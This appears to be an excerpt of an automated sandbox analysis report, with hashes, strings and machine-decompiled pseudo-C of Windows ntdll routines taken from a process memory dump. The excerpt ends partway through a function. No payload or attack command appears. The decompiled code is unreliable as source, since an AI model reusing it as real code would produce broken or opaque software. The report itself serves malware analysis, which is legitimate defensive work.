              • Opcode ID: 75589be06a03f037865fbfbee7f56ebede88e6d89db7dde16a26565668c319b7
              • Instruction ID: fa808d36d034cec5b6ad38042c4f65820e4f2177ba4b2a984686274ca7d87d32
              • Opcode Fuzzy Hash: 75589be06a03f037865fbfbee7f56ebede88e6d89db7dde16a26565668c319b7
              • Instruction Fuzzy Hash: 8C3197B16083059FD711DF19D98096BBBECEBC5754F00056EF69983250E739ED08DB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E04BD1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
              				intOrPtr _v8;
              				char _v16;
              				intOrPtr* _t26;
              				intOrPtr _t29;
              				void* _t30;
              				signed int _t31;
              
              				_t27 = __ecx;
              				_t29 = __edx;
              				_t31 = 0;
              				_v8 = __edx;
              				if(__edx == 0) {
              					L18:
              					_t30 = 0xc000000d;
              					goto L12;
              				} else {
              					_t26 = _a4;
              					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
              						goto L18;
              					} else {
              						E04C0BB40(__ecx,  &_v16, __ecx);
              						_push(_t26);
              						_push(0);
              						_push(0);
              						_push(_t29);
              						_push( &_v16);
              						_t30 = E04C0A9B0();
              						if(_t30 >= 0) {
              							_t19 =  *_t26;
              							if( *_t26 != 0) {
              								goto L7;
              							} else {
              								 *_a8 =  *_a8 & 0;
              							}
              						} else {
              							if(_t30 != 0xc0000023) {
              								L9:
              								_push(_t26);
              								_push( *_t26);
              								_push(_t31);
              								_push(_v8);
              								_push( &_v16);
              								_t30 = E04C0A9B0();
              								if(_t30 < 0) {
              									L12:
              									if(_t31 != 0) {
              										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
              									}
              								} else {
              									 *_a8 = _t31;
              								}
              							} else {
              								_t19 =  *_t26;
              								if( *_t26 == 0) {
              									_t31 = 0;
              								} else {
              									L7:
              									_t31 = L04BE4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
              								}
              								if(_t31 == 0) {
              									_t30 = 0xc0000017;
              								} else {
              									goto L9;
              								}
              							}
              						}
              					}
              				}
              				return _t30;
              			}










              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: WindowsExcludedProcs
              • API String ID: 0-3583428290
              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
              • Instruction ID: 18be6bfa07a18217fae853b0d835ef4429cac611734dca3566b160bb0b626b4d
              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
              • Instruction Fuzzy Hash: 22219576601628ABDB219E9D8980F6BB7AEEF81754F0944E5F9059F200F631FD04A7A0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 71%
              			E04C78DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t35;
              				void* _t41;
              
              				_t40 = __esi;
              				_t39 = __edi;
              				_t38 = __edx;
              				_t35 = __ecx;
              				_t34 = __ebx;
              				_push(0x74);
              				_push(0x4ca0d50);
              				E04C1D0E8(__ebx, __edi, __esi);
              				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
              				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
              				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
              					E04C55720(0x65, 0, "Critical error detected %lx\n", _t35);
              					if( *((intOrPtr*)(_t41 + 8)) != 0) {
              						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
              						asm("int3");
              						 *(_t41 - 4) = 0xfffffffe;
              					}
              				}
              				 *(_t41 - 4) = 1;
              				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
              				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
              				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
              				 *((intOrPtr*)(_t41 - 0x64)) = L04C1DEF0;
              				 *((intOrPtr*)(_t41 - 0x60)) = 1;
              				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
              				_push(_t41 - 0x70);
              				L04C1DEF0(1, _t38);
              				 *(_t41 - 4) = 0xfffffffe;
              				return E04C1D130(_t34, _t39, _t40);
              			}






              Strings
              • Critical error detected %lx, xrefs: 04C78E21
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: Critical error detected %lx
              • API String ID: 0-802127002
              • Opcode ID: f58cb97d27a43cf7d82473058f40218fabf442728992a63af30d8ac487bf5be1
              • Instruction ID: b01c765685dba2d5721a2dd2b7a0ea6fca759b33a2e509d728cb9c5c8bdd95f9
              • Opcode Fuzzy Hash: f58cb97d27a43cf7d82473058f40218fabf442728992a63af30d8ac487bf5be1
              • Instruction Fuzzy Hash: F911ADB5D10348EBEF24DFA485097DCBBB2BB05314F24425DE5296B2A1C3742602EF24
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04C5FF60
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
              • API String ID: 0-1911121157
              • Opcode ID: 9d6de91f0c5c7449f68c53275fd74b5deafdfea731995496259a5c4613914048
              • Instruction ID: c99b5da9ca5175ec49917ede9a314add950f62713b7ca0cd3711e8177b4ce705
              • Opcode Fuzzy Hash: 9d6de91f0c5c7449f68c53275fd74b5deafdfea731995496259a5c4613914048
              • Instruction Fuzzy Hash: 6511E175510144EFEB16DF50C848F9C77B3FB05718F148198E909576B0C738BA80EB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 88%
              			E04C95BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
              				signed int _t296;
              				signed char _t298;
              				signed int _t301;
              				signed int _t306;
              				signed int _t310;
              				signed char _t311;
              				intOrPtr _t312;
              				signed int _t313;
              				void* _t327;
              				signed int _t328;
              				intOrPtr _t329;
              				intOrPtr _t333;
              				signed char _t334;
              				signed int _t336;
              				void* _t339;
              				signed int _t340;
              				signed int _t356;
              				signed int _t362;
              				short _t367;
              				short _t368;
              				short _t373;
              				signed int _t380;
              				void* _t382;
              				short _t385;
              				signed short _t392;
              				signed char _t393;
              				signed int _t395;
              				signed char _t397;
              				signed int _t398;
              				signed short _t402;
              				void* _t406;
              				signed int _t412;
              				signed char _t414;
              				signed short _t416;
              				signed int _t421;
              				signed char _t427;
              				intOrPtr _t434;
              				signed char _t435;
              				signed int _t436;
              				signed int _t442;
              				signed int _t446;
              				signed int _t447;
              				signed int _t451;
              				signed int _t453;
              				signed int _t454;
              				signed int _t455;
              				intOrPtr _t456;
              				intOrPtr* _t457;
              				short _t458;
              				signed short _t462;
              				signed int _t469;
              				intOrPtr* _t474;
              				signed int _t475;
              				signed int _t479;
              				signed int _t480;
              				signed int _t481;
              				short _t485;
              				signed int _t491;
              				signed int* _t494;
              				signed int _t498;
              				signed int _t505;
              				intOrPtr _t506;
              				signed short _t508;
              				signed int _t511;
              				void* _t517;
              				signed int _t519;
              				signed int _t522;
              				void* _t523;
              				signed int _t524;
              				void* _t528;
              				signed int _t529;
              
              				_push(0xd4);
              				_push(0x4ca1178);
              				E04C1D0E8(__ebx, __edi, __esi);
              				_t494 = __edx;
              				 *(_t528 - 0xcc) = __edx;
              				_t511 = __ecx;
              				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
              				 *(_t528 - 0xbc) = __ecx;
              				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
              				_t434 =  *((intOrPtr*)(_t528 + 0x24));
              				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
              				_t427 = 0;
              				 *(_t528 - 0x74) = 0;
              				 *(_t528 - 0x9c) = 0;
              				 *(_t528 - 0x84) = 0;
              				 *(_t528 - 0xac) = 0;
              				 *(_t528 - 0x88) = 0;
              				 *(_t528 - 0xa8) = 0;
              				 *((intOrPtr*)(_t434 + 0x40)) = 0;
              				if( *(_t528 + 0x1c) <= 0x80) {
              					__eflags =  *(__ecx + 0xc0) & 0x00000004;
              					if(__eflags != 0) {
              						_t421 = E04C94C56(0, __edx, __ecx, __eflags);
              						__eflags = _t421;
              						if(_t421 != 0) {
              							 *((intOrPtr*)(_t528 - 4)) = 0;
              							E04C0D000(0x410);
              							 *(_t528 - 0x18) = _t529;
              							 *(_t528 - 0x9c) = _t529;
              							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
              							E04C95542(_t528 - 0x9c, _t528 - 0x84);
              						}
              					}
              					_t435 = _t427;
              					 *(_t528 - 0xd0) = _t435;
              					_t474 = _t511 + 0x65;
              					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
              					_t511 = 0x18;
              					while(1) {
              						 *(_t528 - 0xa0) = _t427;
              						 *(_t528 - 0xbc) = _t427;
              						 *(_t528 - 0x80) = _t427;
              						 *(_t528 - 0x78) = 0x50;
              						 *(_t528 - 0x79) = _t427;
              						 *(_t528 - 0x7a) = _t427;
              						 *(_t528 - 0x8c) = _t427;
              						 *(_t528 - 0x98) = _t427;
              						 *(_t528 - 0x90) = _t427;
              						 *(_t528 - 0xb0) = _t427;
              						 *(_t528 - 0xb8) = _t427;
              						_t296 = 1 << _t435;
              						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
              						__eflags = _t436 & _t296;
              						if((_t436 & _t296) != 0) {
              							goto L92;
              						}
              						__eflags =  *((char*)(_t474 - 1));
              						if( *((char*)(_t474 - 1)) == 0) {
              							goto L92;
              						}
              						_t301 =  *_t474;
              						__eflags = _t494[1] - _t301;
              						if(_t494[1] <= _t301) {
              							L10:
              							__eflags =  *(_t474 - 5) & 0x00000040;
              							if(( *(_t474 - 5) & 0x00000040) == 0) {
              								L12:
              								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
              								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
              									goto L92;
              								}
              								_t442 =  *(_t474 - 0x11) & _t494[3];
              								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
              								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
              									goto L92;
              								}
              								__eflags = _t442 -  *(_t474 - 0x11);
              								if(_t442 !=  *(_t474 - 0x11)) {
              									goto L92;
              								}
              								L15:
              								_t306 =  *(_t474 + 1) & 0x000000ff;
              								 *(_t528 - 0xc0) = _t306;
              								 *(_t528 - 0xa4) = _t306;
              								__eflags =  *0x4cb60e8;
              								if( *0x4cb60e8 != 0) {
              									__eflags = _t306 - 0x40;
              									if(_t306 < 0x40) {
              										L20:
              										asm("lock inc dword [eax]");
              										_t310 =  *0x4cb60e8; // 0x0
              										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
              										__eflags = _t311 & 0x00000001;
              										if((_t311 & 0x00000001) == 0) {
              											 *(_t528 - 0xa0) = _t311;
              											_t475 = _t427;
              											 *(_t528 - 0x74) = _t427;
              											__eflags = _t475;
              											if(_t475 != 0) {
              												L91:
              												_t474 =  *((intOrPtr*)(_t528 - 0x94));
              												goto L92;
              											}
              											asm("sbb edi, edi");
              											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
              											_t511 = _t498;
              											_t312 =  *((intOrPtr*)(_t528 - 0x94));
              											__eflags =  *(_t312 - 5) & 1;
              											if(( *(_t312 - 5) & 1) != 0) {
              												_push(_t528 - 0x98);
              												_push(0x4c);
              												_push(_t528 - 0x70);
              												_push(1);
              												_push(0xfffffffa);
              												_t412 = E04C09710();
              												_t475 = _t427;
              												__eflags = _t412;
              												if(_t412 >= 0) {
              													_t414 =  *(_t528 - 0x98) - 8;
              													 *(_t528 - 0x98) = _t414;
              													_t416 = _t414 + 0x0000000f & 0x0000fff8;
              													 *(_t528 - 0x8c) = _t416;
              													 *(_t528 - 0x79) = 1;
              													_t511 = (_t416 & 0x0000ffff) + _t498;
              													__eflags = _t511;
              												}
              											}
              											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
              											__eflags = _t446 & 0x00000004;
              											if((_t446 & 0x00000004) != 0) {
              												__eflags =  *(_t528 - 0x9c);
              												if( *(_t528 - 0x9c) != 0) {
              													 *(_t528 - 0x7a) = 1;
              													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
              													__eflags = _t511;
              												}
              											}
              											_t313 = 2;
              											_t447 = _t446 & _t313;
              											__eflags = _t447;
              											 *(_t528 - 0xd4) = _t447;
              											if(_t447 != 0) {
              												_t406 = 0x10;
              												_t511 = _t511 + _t406;
              												__eflags = _t511;
              											}
              											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
              											 *(_t528 - 0x88) = _t427;
              											__eflags =  *(_t528 + 0x1c);
              											if( *(_t528 + 0x1c) <= 0) {
              												L45:
              												__eflags =  *(_t528 - 0xb0);
              												if( *(_t528 - 0xb0) != 0) {
              													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
              													__eflags = _t511;
              												}
              												__eflags = _t475;
              												if(_t475 != 0) {
              													asm("lock dec dword [ecx+edx*8+0x4]");
              													goto L100;
              												} else {
              													_t494[3] = _t511;
              													_t451 =  *(_t528 - 0xa0);
              													_t427 = E04C06DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
              													 *(_t528 - 0x88) = _t427;
              													__eflags = _t427;
              													if(_t427 == 0) {
              														__eflags = _t511 - 0xfff8;
              														if(_t511 <= 0xfff8) {
              															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
              															asm("sbb ecx, ecx");
              															__eflags = (_t451 & 0x000000e2) + 8;
              														}
              														asm("lock dec dword [eax+edx*8+0x4]");
              														L100:
              														goto L101;
              													}
              													_t453 =  *(_t528 - 0xa0);
              													 *_t494 = _t453;
              													_t494[1] = _t427;
              													_t494[2] =  *(_t528 - 0xbc);
              													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
              													 *_t427 =  *(_t453 + 0x24) | _t511;
              													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
              													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													__eflags =  *(_t528 + 0x14);
              													if( *(_t528 + 0x14) == 0) {
              														__eflags =  *[fs:0x18] + 0xf50;
              													}
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													asm("movsd");
              													__eflags =  *(_t528 + 0x18);
              													if( *(_t528 + 0x18) == 0) {
              														_t454 =  *(_t528 - 0x80);
              														_t479 =  *(_t528 - 0x78);
              														_t327 = 1;
              														__eflags = 1;
              													} else {
              														_t146 = _t427 + 0x50; // 0x50
              														_t454 = _t146;
              														 *(_t528 - 0x80) = _t454;
              														_t382 = 0x18;
              														 *_t454 = _t382;
              														 *((short*)(_t454 + 2)) = 1;
              														_t385 = 0x10;
              														 *((short*)(_t454 + 6)) = _t385;
              														 *(_t454 + 4) = 0;
              														asm("movsd");
              														asm("movsd");
              														asm("movsd");
              														asm("movsd");
              														_t327 = 1;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 = 0x68;
              														 *(_t528 - 0x78) = _t479;
              													}
              													__eflags =  *(_t528 - 0x79) - _t327;
              													if( *(_t528 - 0x79) == _t327) {
              														_t524 = _t479 + _t427;
              														_t508 =  *(_t528 - 0x8c);
              														 *_t524 = _t508;
              														_t373 = 2;
              														 *((short*)(_t524 + 2)) = _t373;
              														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
              														 *((short*)(_t524 + 4)) = 0;
              														_t167 = _t524 + 8; // 0x8
              														E04C0F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
              														_t529 = _t529 + 0xc;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
              														 *(_t528 - 0x78) = _t479;
              														_t380 =  *(_t528 - 0x80);
              														__eflags = _t380;
              														if(_t380 != 0) {
              															_t173 = _t380 + 4;
              															 *_t173 =  *(_t380 + 4) | 1;
              															__eflags =  *_t173;
              														}
              														_t454 = _t524;
              														 *(_t528 - 0x80) = _t454;
              														_t327 = 1;
              														__eflags = 1;
              													}
              													__eflags =  *(_t528 - 0xd4);
              													if( *(_t528 - 0xd4) == 0) {
              														_t505 =  *(_t528 - 0x80);
              													} else {
              														_t505 = _t479 + _t427;
              														_t523 = 0x10;
              														 *_t505 = _t523;
              														_t367 = 3;
              														 *((short*)(_t505 + 2)) = _t367;
              														_t368 = 4;
              														 *((short*)(_t505 + 6)) = _t368;
              														 *(_t505 + 4) = 0;
              														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
              														_t327 = 1;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 = _t479 + _t523;
              														 *(_t528 - 0x78) = _t479;
              														__eflags = _t454;
              														if(_t454 != 0) {
              															_t186 = _t454 + 4;
              															 *_t186 =  *(_t454 + 4) | 1;
              															__eflags =  *_t186;
              														}
              														 *(_t528 - 0x80) = _t505;
              													}
              													__eflags =  *(_t528 - 0x7a) - _t327;
              													if( *(_t528 - 0x7a) == _t327) {
              														 *(_t528 - 0xd4) = _t479 + _t427;
              														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
              														E04C0F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
              														_t529 = _t529 + 0xc;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 =  *(_t528 - 0x78) + _t522;
              														 *(_t528 - 0x78) = _t479;
              														__eflags = _t505;
              														if(_t505 != 0) {
              															_t199 = _t505 + 4;
              															 *_t199 =  *(_t505 + 4) | 1;
              															__eflags =  *_t199;
              														}
              														_t505 =  *(_t528 - 0xd4);
              														 *(_t528 - 0x80) = _t505;
              													}
              													__eflags =  *(_t528 - 0xa8);
              													if( *(_t528 - 0xa8) != 0) {
              														_t356 = _t479 + _t427;
              														 *(_t528 - 0xd4) = _t356;
              														_t462 =  *(_t528 - 0xac);
              														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
              														_t485 = 0xc;
              														 *((short*)(_t356 + 2)) = _t485;
              														 *(_t356 + 6) = _t462;
              														 *((short*)(_t356 + 4)) = 0;
              														_t211 = _t356 + 8; // 0x9
              														E04C0F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
              														E04C0FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
              														_t529 = _t529 + 0x18;
              														_t427 =  *(_t528 - 0x88);
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t505 =  *(_t528 - 0xd4);
              														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
              														 *(_t528 - 0x78) = _t479;
              														_t362 =  *(_t528 - 0x80);
              														__eflags = _t362;
              														if(_t362 != 0) {
              															_t222 = _t362 + 4;
              															 *_t222 =  *(_t362 + 4) | 1;
              															__eflags =  *_t222;
              														}
              													}
              													__eflags =  *(_t528 - 0xb0);
              													if( *(_t528 - 0xb0) != 0) {
              														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
              														_t458 = 0xb;
              														 *((short*)(_t479 + _t427 + 2)) = _t458;
              														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
              														 *((short*)(_t427 + 4 + _t479)) = 0;
              														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
              														E04C0FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
              														_t529 = _t529 + 0xc;
              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
              														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
              														 *(_t528 - 0x78) = _t479;
              														__eflags = _t505;
              														if(_t505 != 0) {
              															_t241 = _t505 + 4;
              															 *_t241 =  *(_t505 + 4) | 1;
              															__eflags =  *_t241;
              														}
              													}
              													_t328 =  *(_t528 + 0x1c);
              													__eflags = _t328;
              													if(_t328 == 0) {
              														L87:
              														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
              														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
              														_t455 =  *(_t528 - 0xdc);
              														 *(_t427 + 0x14) = _t455;
              														_t480 =  *(_t528 - 0xa0);
              														_t517 = 3;
              														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
              														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
              															asm("rdtsc");
              															 *(_t427 + 0x3c) = _t480;
              														} else {
              															 *(_t427 + 0x3c) = _t455;
              														}
              														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
              														_t456 =  *[fs:0x18];
              														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
              														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
              														_t427 = 0;
              														__eflags = 0;
              														_t511 = 0x18;
              														goto L91;
              													} else {
              														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
              														__eflags = _t519;
              														 *(_t528 - 0x8c) = _t328;
              														do {
              															_t506 =  *((intOrPtr*)(_t519 - 4));
              															_t457 =  *((intOrPtr*)(_t519 - 0xc));
              															 *(_t528 - 0xd4) =  *(_t519 - 8);
              															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
              															__eflags =  *(_t333 + 0x36) & 0x00004000;
              															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
              																_t334 =  *_t519;
              															} else {
              																_t334 = 0;
              															}
              															_t336 = _t334 & 0x000000ff;
              															__eflags = _t336;
              															_t427 =  *(_t528 - 0x88);
              															if(_t336 == 0) {
              																_t481 = _t479 + _t506;
              																__eflags = _t481;
              																 *(_t528 - 0x78) = _t481;
              																E04C0F3E0(_t479 + _t427, _t457, _t506);
              																_t529 = _t529 + 0xc;
              															} else {
              																_t340 = _t336 - 1;
              																__eflags = _t340;
              																if(_t340 == 0) {
              																	E04C0F3E0( *(_t528 - 0xb8), _t457, _t506);
              																	_t529 = _t529 + 0xc;
              																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
              																} else {
              																	__eflags = _t340 == 0;
              																	if(_t340 == 0) {
              																		__eflags = _t506 - 8;
              																		if(_t506 == 8) {
              																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
              																			 *(_t528 - 0xdc) =  *(_t457 + 4);
              																		}
              																	}
              																}
              															}
              															_t339 = 0x10;
              															_t519 = _t519 + _t339;
              															_t263 = _t528 - 0x8c;
              															 *_t263 =  *(_t528 - 0x8c) - 1;
              															__eflags =  *_t263;
              															_t479 =  *(_t528 - 0x78);
              														} while ( *_t263 != 0);
              														goto L87;
              													}
              												}
              											} else {
              												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
              												 *(_t528 - 0xa2) = _t392;
              												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
              												__eflags = _t469;
              												while(1) {
              													 *(_t528 - 0xe4) = _t511;
              													__eflags = _t392;
              													_t393 = _t427;
              													if(_t392 != 0) {
              														_t393 =  *((intOrPtr*)(_t469 + 4));
              													}
              													_t395 = (_t393 & 0x000000ff) - _t427;
              													__eflags = _t395;
              													if(_t395 == 0) {
              														_t511 = _t511 +  *_t469;
              														__eflags = _t511;
              													} else {
              														_t398 = _t395 - 1;
              														__eflags = _t398;
              														if(_t398 == 0) {
              															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
              															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
              														} else {
              															__eflags = _t398 == 1;
              															if(_t398 == 1) {
              																 *(_t528 - 0xa8) =  *(_t469 - 8);
              																_t402 =  *_t469 & 0x0000ffff;
              																 *(_t528 - 0xac) = _t402;
              																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
              															}
              														}
              													}
              													__eflags = _t511 -  *(_t528 - 0xe4);
              													if(_t511 <  *(_t528 - 0xe4)) {
              														break;
              													}
              													_t397 =  *(_t528 - 0x88) + 1;
              													 *(_t528 - 0x88) = _t397;
              													_t469 = _t469 + 0x10;
              													__eflags = _t397 -  *(_t528 + 0x1c);
              													_t392 =  *(_t528 - 0xa2);
              													if(_t397 <  *(_t528 + 0x1c)) {
              														continue;
              													}
              													goto L45;
              												}
              												_t475 = 0x216;
              												 *(_t528 - 0x74) = 0x216;
              												goto L45;
              											}
              										} else {
              											asm("lock dec dword [eax+ecx*8+0x4]");
              											goto L16;
              										}
              									}
              									_t491 = E04C94CAB(_t306, _t528 - 0xa4);
              									 *(_t528 - 0x74) = _t491;
              									__eflags = _t491;
              									if(_t491 != 0) {
              										goto L91;
              									} else {
              										_t474 =  *((intOrPtr*)(_t528 - 0x94));
              										goto L20;
              									}
              								}
              								L16:
              								 *(_t528 - 0x74) = 0x1069;
              								L93:
              								_t298 =  *(_t528 - 0xd0) + 1;
              								 *(_t528 - 0xd0) = _t298;
              								_t474 = _t474 + _t511;
              								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
              								_t494 = 4;
              								__eflags = _t298 - _t494;
              								if(_t298 >= _t494) {
              									goto L100;
              								}
              								_t494 =  *(_t528 - 0xcc);
              								_t435 = _t298;
              								continue;
              							}
              							__eflags = _t494[2] | _t494[3];
              							if((_t494[2] | _t494[3]) == 0) {
              								goto L15;
              							}
              							goto L12;
              						}
              						__eflags = _t301;
              						if(_t301 != 0) {
              							goto L92;
              						}
              						goto L10;
              						L92:
              						goto L93;
              					}
              				} else {
              					_push(0x57);
              					L101:
              					return E04C1D130(_t427, _t494, _t511);
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7669b3f87ada70df4569d81fc5229d5e1ae931e4d2e0f250602b0f08cc6c44ea
              • Instruction ID: f58ed6abbd73d422c18eecca42f620e16f1bad23384015d0b2277f5c569b5755
              • Opcode Fuzzy Hash: 7669b3f87ada70df4569d81fc5229d5e1ae931e4d2e0f250602b0f08cc6c44ea
              • Instruction Fuzzy Hash: 68424D75A00219EFDB24CF68C884BA9B7F2FF45314F1481AAD94DAB281D774AE85CF50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
              			E04BE4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
              				signed int _v8;
              				void* _v20;
              				signed int _v24;
              				char _v532;
              				char _v540;
              				signed short _v544;
              				signed int _v548;
              				signed short* _v552;
              				signed short _v556;
              				signed short* _v560;
              				signed short* _v564;
              				signed short* _v568;
              				void* _v570;
              				signed short* _v572;
              				signed short _v576;
              				signed int _v580;
              				char _v581;
              				void* _v584;
              				unsigned int _v588;
              				signed short* _v592;
              				void* _v597;
              				void* _v600;
              				void* _v604;
              				void* _v609;
              				void* _v616;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				unsigned int _t161;
              				signed int _t162;
              				unsigned int _t163;
              				void* _t169;
              				signed short _t173;
